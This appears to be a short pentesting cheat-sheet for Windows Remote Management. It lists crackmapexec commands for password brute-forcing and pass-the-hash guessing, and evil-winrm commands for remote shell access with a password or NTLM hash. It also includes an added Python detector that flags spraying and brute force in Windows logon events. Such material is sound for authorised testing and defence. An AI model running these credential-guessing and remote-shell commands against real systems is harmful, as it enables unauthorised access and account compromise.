
5985,5986 - Pentesting winrm

windows

WinRM is short for Windows Remote Management, a protocol for remote management of Windows systems. It provides a secure and standards-based way for administrators to remotely manage Windows servers, workstations, and other resources, either from the command line or through automation tools such as PowerShell.

crackmapexec


bruteforce 1 - known: IP - unknown: user/password

crackmapexec winrm $IP -u users.txt -p pass.txt --continue-on-success

bruteforce 2 - known: user/hash - unknown: IP

crackmapexec winrm ip.txt -u $USER -H $HASH --continue-on-success

bruteforce 3 - known: user/password - unknown: IP

crackmapexec winrm ip.txt -u $USER -p $PASS --continue-on-success
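The three crackmapexec runs above look the same from the target's side: a burst of network logons (Event ID 4625 failures, logon type 3) from one source, either many users with one guess each (a spray) or one user with many guesses. The detector below is an added example for the defensive side, not code from this page or from the linked HackTricks book. It runs over constructed records shaped like the fields of Windows Security events 4625/4624 (time, event id, target user, source IP, logon type, authentication package); the pipe-delimited format, the threshold values and the 10-minute window are assumptions chosen for the example.

```python
"""Flag WinRM-style password spraying and brute force in logon events.

Added example (not from the page). Input records are constructed here and
mimic the fields of Windows Security events 4625 (failed logon) and 4624
(successful logon). WinRM logons appear as logon type 3 (network).
"""
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, NamedTuple


class LogonEvent(NamedTuple):
    time: datetime
    event_id: int       # 4625 = failed logon, 4624 = successful logon
    user: str           # TargetUserName
    source_ip: str      # IpAddress
    logon_type: int     # 3 = network logon (what WinRM produces)
    auth_package: str   # AuthenticationPackageName (NTLM, Kerberos, ...)


# Assumed thresholds; tune to the environment.
SPRAY_DISTINCT_USERS = 5      # one source, many users, few guesses each
BRUTE_FAILS_PER_USER = 8      # one source, one user, many guesses
FAILS_BEFORE_SUCCESS = 3      # a lone typo before a good logon is not an alert
WINDOW = timedelta(minutes=10)


def parse_record(line: str) -> LogonEvent:
    """Parse one constructed record: time|event_id|user|ip|logon_type|package."""
    t, eid, user, ip, ltype, pkg = (f.strip() for f in line.split("|"))
    return LogonEvent(datetime.fromisoformat(t), int(eid), user, ip, int(ltype), pkg)


def detect(records: List[str]) -> List[Dict[str, str]]:
    """Return one finding per (rule, source_ip, subject), in time order."""
    events = sorted((parse_record(r) for r in records), key=lambda e: e.time)
    recent_failures = defaultdict(list)   # source_ip -> failures inside WINDOW
    findings: List[Dict[str, str]] = []
    seen = set()

    def emit(rule: str, src: str, subject: str, detail: str) -> None:
        key = (rule, src, subject)
        if key in seen:
            return                     # report each condition once per source
        seen.add(key)
        findings.append({"rule": rule, "source_ip": src,
                         "subject": subject, "detail": detail})

    for ev in events:
        if ev.logon_type != 3:
            continue                   # interactive/other logons are out of scope
        # keep only this source's failures that are still inside the window
        fails = [f for f in recent_failures[ev.source_ip] if ev.time - f.time <= WINDOW]
        if ev.event_id == 4625:
            fails.append(ev)
            users = {f.user for f in fails}
            if len(users) >= SPRAY_DISTINCT_USERS:
                emit("password_spray", ev.source_ip, "*",
                     f"{len(users)} distinct users failed within {WINDOW}")
            per_user = sum(1 for f in fails if f.user == ev.user)
            if per_user >= BRUTE_FAILS_PER_USER:
                emit("brute_force", ev.source_ip, ev.user,
                     f"{per_user} failures for one account within {WINDOW}")
        elif ev.event_id == 4624 and len(fails) >= FAILS_BEFORE_SUCCESS:
            emit("success_after_failures", ev.source_ip, ev.user,
                 f"successful {ev.auth_package} logon after {len(fails)} failures")
        recent_failures[ev.source_ip] = fails
    return findings


# Constructed sample data (all values invented for the example).
SAMPLE_RECORDS = [
    # one guess against each of six accounts from one host, then a hit
    "2024-05-01T10:00:00|4625|alice|10.0.0.5|3|NTLM",
    "2024-05-01T10:00:05|4625|bob|10.0.0.5|3|NTLM",
    "2024-05-01T10:00:10|4625|carol|10.0.0.5|3|NTLM",
    "2024-05-01T10:00:15|4625|dave|10.0.0.5|3|NTLM",
    "2024-05-01T10:00:20|4625|eve|10.0.0.5|3|NTLM",
    "2024-05-01T10:00:25|4624|frank|10.0.0.5|3|NTLM",
    # an admin mistypes once, then logs on: should stay quiet
    "2024-05-01T10:05:00|4625|admin|10.0.0.20|3|Kerberos",
    "2024-05-01T10:05:30|4624|admin|10.0.0.20|3|Kerberos",
] + [
    # eight guesses against one service account from one host
    f"2024-05-01T10:10:{i * 5:02d}|4625|svc_backup|10.0.0.9|3|NTLM" for i in range(8)
] + [
    # console logon failure (type 2) is not a WinRM signal and is ignored
    "2024-05-01T10:12:00|4625|bob|10.0.0.7|2|Negotiate",
]

if __name__ == "__main__":
    for finding in detect(SAMPLE_RECORDS):
        print(finding)
```

The success-after-failures rule is the one worth watching most closely: it is the point where `--continue-on-success` style guessing turns into a valid credential, and on a real host the same 4624 would be followed by a WinRM session (WSMan operational log, PowerShell remoting logs) from that source.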

evil-winrm


evil-winrm - with password

evil-winrm -i $IP -u $USER -p $PASS

evil-winrm - with hash

evil-winrm -i $IP -u $USER -H $NTLM_HASH


  • https://book.hacktricks.xyz/network-services-pentesting/5985-5986-pentesting-winrm